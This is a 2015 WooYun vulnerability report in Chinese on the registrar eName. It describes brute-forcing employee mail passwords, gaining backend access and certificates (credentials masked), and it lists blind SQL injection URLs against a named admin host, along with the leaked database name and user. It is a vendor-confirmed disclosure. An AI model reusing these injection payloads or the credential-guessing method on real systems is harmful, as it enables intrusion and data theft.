当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113054

漏洞标题:企业应用安全的软肋之易名中国(部分域名劫持、后台漫游、sql注入等)

相关厂商:易名中国

漏洞作者: 北京方便面

提交时间:2015-05-09 14:45

修复时间:2015-06-25 08:54

公开时间:2015-06-25 08:54

漏洞类型:账户体系控制不严

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-09: 细节已通知厂商并且等待厂商处理中
2015-05-11: 厂商已经确认,细节仅向厂商公开
2015-05-21: 细节向核心白帽子及相关领域专家公开
2015-05-31: 细节向普通白帽子公开
2015-06-10: 细节向实习白帽子公开
2015-06-25: 细节向公众公开

简要描述:

企业应用安全的软肋之易名中国(部分域名劫持、后台漫游、sql注入等)
易名中国在乌云只有5个漏洞,安全性还蛮牛的,尝试了一些正面方式都没能搞定,于是只能采用很黄很暴力的方式了
U.CC 看着直流口水的域名(´Д`)

详细说明:

http://mail.ename.com
邮箱账号测试了好几种命名方式,最后发现ename的邮箱账号命名方式为:
姓+名字缩写@ename.com
利用常见姓名作为用户字典进行爆破 获得几个弱口令账号
由于邮箱内没有完整的企业邮箱通讯录,只能想其他办法
找到关于腾讯办公QQ的信息 登陆之 获得员工列表 整理继续爆破之
获得如下弱口令邮箱(大的互联网企业的通病,人)

mask 区域
*****5@ename.co*****
*****me.com :*****
*****me.com *****
*****e.com :*****
*****me.com *****
*****e.com :*****
*****.com : w*****
*****me.com *****
*****e.com :*****
*****e.com :*****
*****me.com :*****
*****me.com :*****
*****cod*****


邮箱内共计找到10枚后台p12证书
各种密码若干

https://r.webnic.cc/index.jsp
登录信息:
mask 区域
*****xmename*****
*****Rdo@T&lt*****
*****户名enamebroker *****
*****
*****
*****
*****
*****, 密码: *****
*****
*****
*****
*****
*****
*****
*****账^*****
*****y 密码*****
*****
*****
*****
*****
*****
*****
*****:service*****
*****
*****
*****d8Win&lt*****
***** : '02728a7692012170', 'h*****
*****^QQ(400*****
*****1002@400*****
*****eName2*****
*****eName2*****
**********
*****^^下、匿名接受push,请统一使用^*****
*****^*****
*****359*****
*****eName*****
**********
*****^*****
*****com*****
*****vemi@1*****
*****Yumin*****
**********
*****^*****
*****cn*****
*****63.com/ID*****
*****Yumin*****
**********
*****^*****
*****.co*****
*****^^mo*****
*****Yumin*****
**********
*****com*****
*****^^mo*****
*****Yumin*****
**********
*****^*****
*****et.*****
*****vemi@1*****
*****Yumin*****
**********
*****^*****
*****63.*****
*****^^mo*****
*****Yumin*****
**********
*****^*****
*****t.c*****
*****vemi@1*****
*****Yumin*****
**********
*****^*****
*****.co*****
*****vemi@1*****
*****Yumin*****
**********
*****^*****
*****mi.*****
*****mi@163.*****
*****Yumin*****
**********
**********
*****o
*****
*****com*****
*****vemi@1*****
*****Ename*****
**********
*****ad*****
*****dy.*****
*****vemi@1*****
*****Ename*****


------------------


确认后请找乌云官方的人打码

漏洞证明:

屏幕快照 2015-05-09 下午2.33.11.png


屏幕快照 2015-05-09 下午2.34.12.png


屏幕快照 2015-05-09 下午2.34.47.png


屏幕快照 2015-05-09 下午2.35.15.png


看着这个域名直流口水

屏幕快照 2015-05-09 下午12.33.44.png


屏幕快照 2015-05-09 下午12.33.56.png


2.png


屏幕快照 2015-05-09 下午2.05.19.png


5.png


屏幕快照 2015-05-09 下午2.38.44.png


后台是存在sql注入的:

http://managenew.ename.cn/index.php/finance/index?enameId=972601-length(database())&submit=查询&email=2929904071%40qq.com#
http://managenew.ename.cn/index.php/finance/index?enameId=972601-ascii(substr(database(),1,1))&submit=查询&email=2929904071%40qq.com#
http://managenew.ename.cn/index.php/finance/index?enameId=972601-ascii(substr(database(),2,1))&submit=查询&email=2929904071%40qq.com#
http://managenew.ename.cn/index.php/finance/index?enameId=972601-ascii(substr(database(),3,1))&submit=查询&email=2929904071%40qq.com#
http://managenew.ename.cn/index.php/finance/index?enameId=972601-ascii(substr(database(),4,1))&submit=查询&email=2929904071%40qq.com#
http://managenew.ename.cn/index.php/finance/index?enameId=972601-ascii(substr(database(),5,1))&submit=查询&email=2929904071%40qq.com#
12位


后面顺延 就不都写了
库名:ename_member
数据库用户名:sdkUsereNa@192.168.20.75

修复方案:

求礼物
如果是真正的黑客攻击,修复时需要注意:邮箱是否留有转发后门,是否被恶意设置了密保(虽然我没留后门,但好多企业修复都只是改改密码,根本不会注意这些地方。(´Д`))
邮箱攻击的好处在于,一次成功的攻击过后,黑客可以收集到大量信息(如邮箱通讯录,同样可能是其他系统的用户名),在漏洞修复之后,黑客还可以使用收集到的信息二进宫。

版权声明:转载请注明来源 北京方便面@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-11 08:53

厂商回复:

非常感谢!请继续帮我们寻找漏洞,让我们的平台更安全。

最新状态:

暂无